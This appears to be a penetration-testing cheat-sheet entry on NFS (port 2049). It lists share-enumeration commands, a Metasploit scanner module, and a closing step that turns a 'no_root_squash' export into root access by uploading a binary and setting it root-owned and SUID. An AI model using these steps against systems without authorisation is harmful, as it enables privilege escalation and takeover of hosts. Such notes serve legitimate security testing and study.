NFS 2049

Show Mountable NFS Shares

rpcinfo -p 10.10.10.10

showmount -e 10.10.10.10

showmount 10.10.10.10 #Connected Hosts

showmount -d 10.10.10.10 #Directories

showmount -a 10.10.10.10 #Mount Points

#Metasploit scanner

use auxiliary/scanner/nfs/nfsmount

#List NFS exported shares. If 'rw,no_root_squash' is present, upload and execute sid-shell

chown root:root sid-shell; chmod +s sid-shell

Last updated